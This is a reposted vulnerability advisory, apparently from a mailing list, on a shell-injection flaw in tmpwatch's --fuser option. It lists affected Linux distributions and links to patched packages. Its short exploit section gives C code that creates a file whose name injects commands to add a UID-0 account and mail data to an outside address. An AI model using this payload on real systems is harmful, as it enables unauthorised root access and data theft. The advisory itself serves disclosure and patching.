Insecure call of external programs in tmpwatch
------------------------------------------------------------------------
SUMMARY
The tmpwatch utility is used in Red Hat Linux to remove temporary files.
This utility has an option to call the "fuser" program, which verifies
if
a file is currently opened by a process. The fuser program is invoked
within tmpwatch by calling the system() library subroutine. Insecure
handling of the arguments to this subroutine could potentially allow an
attacker to execute arbitrary commands.
DETAILS
Affected Versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gr�ficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2
Immune Versions:
SuSE
Impact:
This vulnerability may allow local attackers to compromise superuser
access if the administrator in a non-default manner uses tmpwatch.
The tmpwatch tool removes files that have not been modified or accessed
within a specified amount of time. It was designed to securely remove
files by avoiding typical race condition vulnerabilities. System
administrators usually run this tool periodically to remove old
temporary
files in world-writeable directories.
The tmpwatch tool uses the --fuser or -s options to avoid removing a
file
that is in an open state in another process. This option uses the
system() library subroutine to call the external program /sbin/fuser
with
the file name being examined as an argument. The system() subroutine
spawns a shell to execute the command. An attacker may create a file
name
containing shell metacharacters, which could allow them to execute
arbitrary commands if tmpwatch with the fuser option is used to remove
the
file.
Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch
packages suggests this vulnerability was recognized and a fix was
attempted. However, the fix is incorrect, and the vulnerability is still
exploitable.
Exploit:
1. Compile and run:
#include <stdio.h>
int main()
{
FILE *f;
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
[EMAIL PROTECTED]<blablabla";
if((f = fopen(filename, "a")) == 0) {
perror("Could not create file");
exit(1);
}
close(f);
}
2. cp /usr/sbin/adduser /tmp
3. Just wait for mail.
Recommendations:
Do not use the --fuser or -s options with tmpwatch.
Red Hat has issued the following RPMs that contain fixes for this
vulnerability.
Red Hat Linux 6.2:
Alpha:
<ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm>
ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
Sparc:
<ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm>
ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
i386:
<ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm>
ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
Sources:
<ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm>
ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
Red Hat Linux 7.0:
i386:
<ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm>
ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
Sources:
<ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm>
ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm
Conectiva:
<ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm>
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm>
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
Trustix Secure Linux:
This file can be found at:
<http://www.trustix.net/download/Trustix/updates/1.1/RPMS/>
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
Or
<ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/>
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
Mandrake:
You can download the updates directly from:
<ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates>
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
<ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates>
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates
Linux-Mandrake 6.0:
6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 6.1:
6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.0:
7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.1:
7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Immunix OS 6.2:
<
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
>
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
Or
<
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
>
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
--
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml
This message contains no viruses. Guaranteed by AVP.
------------------------------------------------------------------------
Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM)
Informasi : http:[EMAIL PROTECTED]
Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/
WAP : http://mikrodata.co.id/wap/index.wml
Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA.
Termasuk rubrik-rubrik yang ada di media lain.
Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah
tindakan kriminal.
Please check with the latest AVP update before you ask about virus:
ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip
